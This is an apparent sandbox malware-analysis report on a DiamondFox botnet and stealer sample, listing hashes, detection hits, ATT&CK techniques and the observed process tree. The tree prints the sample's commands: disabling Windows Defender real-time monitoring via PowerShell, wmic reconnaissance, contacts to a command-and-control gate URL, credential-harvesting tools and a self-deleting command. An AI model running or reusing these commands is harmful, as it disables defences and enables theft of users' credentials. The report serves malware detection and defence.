diamondfox | 2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

Analysis

max time kernel
136s
max time network
134s
platform
windows10_x64
resource
win10v20210408
submitted
04-07-2021 12:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe
Size

203KB
MD5

a1e165e1926c0c83123c89fce6b1af56
SHA1

281246ba4b852a5f62e032424f7816f5a6b0406f
SHA256

2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA512

28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Score

10^/10

diamondfox botnet discovery spyware stealer

Malware Config

Signatures

DiamondFox
DiamondFox is a multipurpose botnet with many capabilities.
botnet stealer diamondfox

DiamondFox payload 11 IoCs

Detects DiamondFox payload in file/memory.

resource	yara_rule
behavioral2/files/0x000300000001ab1e-115.dat	diamondfox
behavioral2/files/0x000300000001ab1e-116.dat	diamondfox
behavioral2/files/0x000300000001ab1e-197.dat	diamondfox
behavioral2/files/0x000300000001ab1e-201.dat	diamondfox
behavioral2/files/0x000300000001ab1e-207.dat	diamondfox
behavioral2/files/0x000300000001ab1e-210.dat	diamondfox
behavioral2/files/0x000300000001ab1e-213.dat	diamondfox
behavioral2/files/0x000300000001ab1e-215.dat	diamondfox
behavioral2/files/0x000300000001ab1e-219.dat	diamondfox
behavioral2/files/0x000300000001ab1e-223.dat	diamondfox
behavioral2/files/0x000300000001ab1e-227.dat	diamondfox

NirSoft MailPassView 2 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral2/memory/1524-209-0x000000000044412E-mapping.dmp	MailPassView
behavioral2/memory/1524-211-0x0000000000400000-0x0000000000455000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 2 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/memory/2300-196-0x00000000004466F4-mapping.dmp	WebBrowserPassView
behavioral2/memory/2300-198-0x0000000000400000-0x000000000047C000-memory.dmp	WebBrowserPassView

Nirsoft 6 IoCs

resource	yara_rule
behavioral2/memory/2300-196-0x00000000004466F4-mapping.dmp	Nirsoft
behavioral2/memory/2300-198-0x0000000000400000-0x000000000047C000-memory.dmp	Nirsoft
behavioral2/memory/2264-206-0x0000000000413E10-mapping.dmp	Nirsoft
behavioral2/memory/2264-208-0x0000000000400000-0x0000000000422000-memory.dmp	Nirsoft
behavioral2/memory/1524-209-0x000000000044412E-mapping.dmp	Nirsoft
behavioral2/memory/1524-211-0x0000000000400000-0x0000000000455000-memory.dmp	Nirsoft

Executes dropped EXE 10 IoCs

pid	Process
4084	MicrosoftEdgeCPS.exe
2300	MicrosoftEdgeCPS.exe
592	MicrosoftEdgeCPS.exe
2264	MicrosoftEdgeCPS.exe
1524	MicrosoftEdgeCPS.exe
656	MicrosoftEdgeCPS.exe
2236	MicrosoftEdgeCPS.exe
196	MicrosoftEdgeCPS.exe
3584	MicrosoftEdgeCPS.exe
1280	MicrosoftEdgeCPS.exe

Deletes itself 1 IoCs

pid	Process
2852	powershell.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Suspicious use of SetThreadContext 9 IoCs

description	pid	Process	procid_target
PID 4084 set thread context of 2300	4084	MicrosoftEdgeCPS.exe	97
PID 4084 set thread context of 592	4084	MicrosoftEdgeCPS.exe	98
PID 4084 set thread context of 2264	4084	MicrosoftEdgeCPS.exe	99
PID 4084 set thread context of 1524	4084	MicrosoftEdgeCPS.exe	100
PID 4084 set thread context of 656	4084	MicrosoftEdgeCPS.exe	101
PID 4084 set thread context of 2236	4084	MicrosoftEdgeCPS.exe	104
PID 4084 set thread context of 196	4084	MicrosoftEdgeCPS.exe	105
PID 4084 set thread context of 3584	4084	MicrosoftEdgeCPS.exe	106
PID 4084 set thread context of 1280	4084	MicrosoftEdgeCPS.exe	107

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3868	1280	WerFault.exe	107

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
1632	notepad.exe

Suspicious behavior: EnumeratesProcesses 34 IoCs

pid	Process
2852	powershell.exe
2308	powershell.exe
2852	powershell.exe
2308	powershell.exe
2852	powershell.exe
2308	powershell.exe
4084	MicrosoftEdgeCPS.exe
4084	MicrosoftEdgeCPS.exe
2300	MicrosoftEdgeCPS.exe
2300	MicrosoftEdgeCPS.exe
2300	MicrosoftEdgeCPS.exe
2300	MicrosoftEdgeCPS.exe
2264	MicrosoftEdgeCPS.exe
2264	MicrosoftEdgeCPS.exe
1280	MicrosoftEdgeCPS.exe
1280	MicrosoftEdgeCPS.exe
4084	MicrosoftEdgeCPS.exe
4084	MicrosoftEdgeCPS.exe
3868	WerFault.exe
3868	WerFault.exe
3868	WerFault.exe
3868	WerFault.exe
3868	WerFault.exe
3868	WerFault.exe
3868	WerFault.exe
3868	WerFault.exe
3868	WerFault.exe
3868	WerFault.exe
3868	WerFault.exe
3868	WerFault.exe
3868	WerFault.exe
3868	WerFault.exe
4084	MicrosoftEdgeCPS.exe
4084	MicrosoftEdgeCPS.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	2080	wmic.exe
Token: SeSecurityPrivilege	2080	wmic.exe
Token: SeTakeOwnershipPrivilege	2080	wmic.exe
Token: SeLoadDriverPrivilege	2080	wmic.exe
Token: SeSystemProfilePrivilege	2080	wmic.exe
Token: SeSystemtimePrivilege	2080	wmic.exe
Token: SeProfSingleProcessPrivilege	2080	wmic.exe
Token: SeIncBasePriorityPrivilege	2080	wmic.exe
Token: SeCreatePagefilePrivilege	2080	wmic.exe
Token: SeBackupPrivilege	2080	wmic.exe
Token: SeRestorePrivilege	2080	wmic.exe
Token: SeShutdownPrivilege	2080	wmic.exe
Token: SeDebugPrivilege	2080	wmic.exe
Token: SeSystemEnvironmentPrivilege	2080	wmic.exe
Token: SeRemoteShutdownPrivilege	2080	wmic.exe
Token: SeUndockPrivilege	2080	wmic.exe
Token: SeManageVolumePrivilege	2080	wmic.exe
Token: 33	2080	wmic.exe
Token: 34	2080	wmic.exe
Token: 35	2080	wmic.exe
Token: 36	2080	wmic.exe
Token: SeDebugPrivilege	2308	powershell.exe
Token: SeDebugPrivilege	2852	powershell.exe
Token: SeIncreaseQuotaPrivilege	2080	wmic.exe
Token: SeSecurityPrivilege	2080	wmic.exe
Token: SeTakeOwnershipPrivilege	2080	wmic.exe
Token: SeLoadDriverPrivilege	2080	wmic.exe
Token: SeSystemProfilePrivilege	2080	wmic.exe
Token: SeSystemtimePrivilege	2080	wmic.exe
Token: SeProfSingleProcessPrivilege	2080	wmic.exe
Token: SeIncBasePriorityPrivilege	2080	wmic.exe
Token: SeCreatePagefilePrivilege	2080	wmic.exe
Token: SeBackupPrivilege	2080	wmic.exe
Token: SeRestorePrivilege	2080	wmic.exe
Token: SeShutdownPrivilege	2080	wmic.exe
Token: SeDebugPrivilege	2080	wmic.exe
Token: SeSystemEnvironmentPrivilege	2080	wmic.exe
Token: SeRemoteShutdownPrivilege	2080	wmic.exe
Token: SeUndockPrivilege	2080	wmic.exe
Token: SeManageVolumePrivilege	2080	wmic.exe
Token: 33	2080	wmic.exe
Token: 34	2080	wmic.exe
Token: 35	2080	wmic.exe
Token: 36	2080	wmic.exe
Token: SeIncreaseQuotaPrivilege	3180	wmic.exe
Token: SeSecurityPrivilege	3180	wmic.exe
Token: SeTakeOwnershipPrivilege	3180	wmic.exe
Token: SeLoadDriverPrivilege	3180	wmic.exe
Token: SeSystemProfilePrivilege	3180	wmic.exe
Token: SeSystemtimePrivilege	3180	wmic.exe
Token: SeProfSingleProcessPrivilege	3180	wmic.exe
Token: SeIncBasePriorityPrivilege	3180	wmic.exe
Token: SeCreatePagefilePrivilege	3180	wmic.exe
Token: SeBackupPrivilege	3180	wmic.exe
Token: SeRestorePrivilege	3180	wmic.exe
Token: SeShutdownPrivilege	3180	wmic.exe
Token: SeDebugPrivilege	3180	wmic.exe
Token: SeSystemEnvironmentPrivilege	3180	wmic.exe
Token: SeRemoteShutdownPrivilege	3180	wmic.exe
Token: SeUndockPrivilege	3180	wmic.exe
Token: SeManageVolumePrivilege	3180	wmic.exe
Token: 33	3180	wmic.exe
Token: 34	3180	wmic.exe
Token: 35	3180	wmic.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
592	MicrosoftEdgeCPS.exe
2236	MicrosoftEdgeCPS.exe
196	MicrosoftEdgeCPS.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 776 wrote to memory of 4084	776	2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe	77
PID 776 wrote to memory of 4084	776	2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe	77
PID 776 wrote to memory of 4084	776	2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe	77
PID 776 wrote to memory of 2852	776	2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe	78
PID 776 wrote to memory of 2852	776	2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe	78
PID 776 wrote to memory of 2852	776	2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe	78
PID 4084 wrote to memory of 2308	4084	MicrosoftEdgeCPS.exe	79
PID 4084 wrote to memory of 2308	4084	MicrosoftEdgeCPS.exe	79
PID 4084 wrote to memory of 2308	4084	MicrosoftEdgeCPS.exe	79
PID 4084 wrote to memory of 2080	4084	MicrosoftEdgeCPS.exe	82
PID 4084 wrote to memory of 2080	4084	MicrosoftEdgeCPS.exe	82
PID 4084 wrote to memory of 2080	4084	MicrosoftEdgeCPS.exe	82
PID 4084 wrote to memory of 3180	4084	MicrosoftEdgeCPS.exe	84
PID 4084 wrote to memory of 3180	4084	MicrosoftEdgeCPS.exe	84
PID 4084 wrote to memory of 3180	4084	MicrosoftEdgeCPS.exe	84
PID 4084 wrote to memory of 2792	4084	MicrosoftEdgeCPS.exe	86
PID 4084 wrote to memory of 2792	4084	MicrosoftEdgeCPS.exe	86
PID 4084 wrote to memory of 2792	4084	MicrosoftEdgeCPS.exe	86
PID 4084 wrote to memory of 1076	4084	MicrosoftEdgeCPS.exe	88
PID 4084 wrote to memory of 1076	4084	MicrosoftEdgeCPS.exe	88
PID 4084 wrote to memory of 1076	4084	MicrosoftEdgeCPS.exe	88
PID 4084 wrote to memory of 2272	4084	MicrosoftEdgeCPS.exe	91
PID 4084 wrote to memory of 2272	4084	MicrosoftEdgeCPS.exe	91
PID 4084 wrote to memory of 2272	4084	MicrosoftEdgeCPS.exe	91
PID 4084 wrote to memory of 2140	4084	MicrosoftEdgeCPS.exe	93
PID 4084 wrote to memory of 2140	4084	MicrosoftEdgeCPS.exe	93
PID 4084 wrote to memory of 2140	4084	MicrosoftEdgeCPS.exe	93
PID 4084 wrote to memory of 2944	4084	MicrosoftEdgeCPS.exe	95
PID 4084 wrote to memory of 2944	4084	MicrosoftEdgeCPS.exe	95
PID 4084 wrote to memory of 2944	4084	MicrosoftEdgeCPS.exe	95
PID 4084 wrote to memory of 2300	4084	MicrosoftEdgeCPS.exe	97
PID 4084 wrote to memory of 2300	4084	MicrosoftEdgeCPS.exe	97
PID 4084 wrote to memory of 2300	4084	MicrosoftEdgeCPS.exe	97
PID 4084 wrote to memory of 2300	4084	MicrosoftEdgeCPS.exe	97
PID 4084 wrote to memory of 2300	4084	MicrosoftEdgeCPS.exe	97
PID 4084 wrote to memory of 2300	4084	MicrosoftEdgeCPS.exe	97
PID 4084 wrote to memory of 2300	4084	MicrosoftEdgeCPS.exe	97
PID 4084 wrote to memory of 2300	4084	MicrosoftEdgeCPS.exe	97
PID 4084 wrote to memory of 2300	4084	MicrosoftEdgeCPS.exe	97
PID 4084 wrote to memory of 592	4084	MicrosoftEdgeCPS.exe	98
PID 4084 wrote to memory of 592	4084	MicrosoftEdgeCPS.exe	98
PID 4084 wrote to memory of 592	4084	MicrosoftEdgeCPS.exe	98
PID 4084 wrote to memory of 592	4084	MicrosoftEdgeCPS.exe	98
PID 4084 wrote to memory of 592	4084	MicrosoftEdgeCPS.exe	98
PID 4084 wrote to memory of 592	4084	MicrosoftEdgeCPS.exe	98
PID 4084 wrote to memory of 592	4084	MicrosoftEdgeCPS.exe	98
PID 4084 wrote to memory of 592	4084	MicrosoftEdgeCPS.exe	98
PID 4084 wrote to memory of 2264	4084	MicrosoftEdgeCPS.exe	99
PID 4084 wrote to memory of 2264	4084	MicrosoftEdgeCPS.exe	99
PID 4084 wrote to memory of 2264	4084	MicrosoftEdgeCPS.exe	99
PID 4084 wrote to memory of 2264	4084	MicrosoftEdgeCPS.exe	99
PID 4084 wrote to memory of 2264	4084	MicrosoftEdgeCPS.exe	99
PID 4084 wrote to memory of 2264	4084	MicrosoftEdgeCPS.exe	99
PID 4084 wrote to memory of 2264	4084	MicrosoftEdgeCPS.exe	99
PID 4084 wrote to memory of 2264	4084	MicrosoftEdgeCPS.exe	99
PID 4084 wrote to memory of 2264	4084	MicrosoftEdgeCPS.exe	99
PID 4084 wrote to memory of 1524	4084	MicrosoftEdgeCPS.exe	100
PID 4084 wrote to memory of 1524	4084	MicrosoftEdgeCPS.exe	100
PID 4084 wrote to memory of 1524	4084	MicrosoftEdgeCPS.exe	100
PID 4084 wrote to memory of 1524	4084	MicrosoftEdgeCPS.exe	100
PID 4084 wrote to memory of 1524	4084	MicrosoftEdgeCPS.exe	100
PID 4084 wrote to memory of 1524	4084	MicrosoftEdgeCPS.exe	100
PID 4084 wrote to memory of 1524	4084	MicrosoftEdgeCPS.exe	100
PID 4084 wrote to memory of 1524	4084	MicrosoftEdgeCPS.exe	100

C:\Users\Admin\AppData\Local\Temp\2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe
"C:\Users\Admin\AppData\Local\Temp\2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:776
- C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
  "C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4084
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableRealtimeMonitoring 1
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2308
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic" /Node:localhost /Namespace:\\root\SecurityCenter2 path AntiVirusProduct get DisplayName /FORMAT:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2080
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic" os get caption /FORMAT:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3180
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic" path win32_VideoController get caption /FORMAT:List
    3⤵
    PID:2792
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic" path win32_NetworkAdapterConfiguration where IPEnabled=1 get IPAddress /FORMAT:List
    3⤵
    PID:1076
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic" LogicalDisk Where DriveType=4 get VolumeName /FORMAT:List
    3⤵
    PID:2272
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List
    3⤵
    PID:2140
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List
    3⤵
    PID:2944
- - C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
    /scomma "C:\Users\Admin\AppData\Local\Temp\1.log"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:2300
- - C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
    /scomma "C:\Users\Admin\AppData\Local\Temp\4.log"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:592
- - C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
    /scomma "C:\Users\Admin\AppData\Local\Temp\2.log"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:2264
- - C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
    /scomma "C:\Users\Admin\AppData\Local\Temp\3.log"
    3⤵
    - Executes dropped EXE
    PID:1524
- - C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
    X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
    3⤵
    - Executes dropped EXE
    PID:656
  - - C:\Windows\notepad.exe
      X C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
      4⤵
      Opens file in notepad (likely ransom note)
      PID:1632
  - - C:\Windows\write.exe
      X C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
      4⤵
      PID:3080
- - C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
    X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:2236
- - C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
    X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:196
- - C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
    X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
    3⤵
    - Executes dropped EXE
    PID:3584
- - C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
    X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:1280
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1280 -s 588
      4⤵
      Program crash
      Suspicious behavior: EnumeratesProcesses
      PID:3868
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List
    3⤵
    PID:3796
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List
    3⤵
    PID:3544
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List
    3⤵
    PID:408
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    "wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List
    3⤵
    PID:2672
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Start-Sleep -s 10; Remove-Item -Path 'C:\Users\Admin\AppData\Local\Temp\2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe' -Force -Recurse
  2⤵
  - Deletes itself
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2852

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/196-220-0x0000000000400000-0x0000000000406000-memory.dmp

Filesize
24KB

Download
memory/592-204-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/656-218-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/1280-230-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/1524-211-0x0000000000400000-0x0000000000455000-memory.dmp

Filesize
340KB

Download
memory/2236-221-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2264-208-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/2300-198-0x0000000000400000-0x000000000047C000-memory.dmp

Filesize
496KB

Download
memory/2308-128-0x0000000003930000-0x0000000003931000-memory.dmp

Filesize
4KB

Download
memory/2308-136-0x00000000082B0000-0x00000000082B1000-memory.dmp

Filesize
4KB

Download
memory/2308-181-0x0000000003933000-0x0000000003934000-memory.dmp

Filesize
4KB

Download
memory/2308-138-0x0000000008350000-0x0000000008351000-memory.dmp

Filesize
4KB

Download
memory/2308-178-0x0000000009CE0000-0x0000000009CE1000-memory.dmp

Filesize
4KB

Download
memory/2308-176-0x0000000009830000-0x0000000009831000-memory.dmp

Filesize
4KB

Download
memory/2308-171-0x000000007EA40000-0x000000007EA41000-memory.dmp

Filesize
4KB

Download
memory/2308-170-0x0000000008B40000-0x0000000008B41000-memory.dmp

Filesize
4KB

Download
memory/2308-163-0x00000000097A0000-0x00000000097D3000-memory.dmp

Filesize
204KB

Download
memory/2308-132-0x0000000007FC0000-0x0000000007FC1000-memory.dmp

Filesize
4KB

Download
memory/2308-125-0x0000000007990000-0x0000000007991000-memory.dmp

Filesize
4KB

Download
memory/2308-130-0x0000000003932000-0x0000000003933000-memory.dmp

Filesize
4KB

Download
memory/2308-134-0x0000000008240000-0x0000000008241000-memory.dmp

Filesize
4KB

Download
memory/2852-160-0x0000000008930000-0x0000000008931000-memory.dmp

Filesize
4KB

Download
memory/2852-127-0x00000000008D0000-0x00000000008D1000-memory.dmp

Filesize
4KB

Download
memory/2852-143-0x0000000007CB0000-0x0000000007CB1000-memory.dmp

Filesize
4KB

Download
memory/2852-141-0x00000000074D0000-0x00000000074D1000-memory.dmp

Filesize
4KB

Download
memory/2852-129-0x00000000008D2000-0x00000000008D3000-memory.dmp

Filesize
4KB

Download
memory/2852-157-0x0000000009190000-0x0000000009191000-memory.dmp

Filesize
4KB

Download
memory/2852-123-0x0000000001070000-0x0000000001071000-memory.dmp

Filesize
4KB

Download
memory/2852-146-0x0000000007C20000-0x0000000007C21000-memory.dmp

Filesize
4KB

Download
memory/2852-205-0x00000000008D3000-0x00000000008D4000-memory.dmp

Filesize
4KB

Download
memory/3584-225-0x0000000000400000-0x0000000000431000-memory.dmp

Filesize
196KB

Download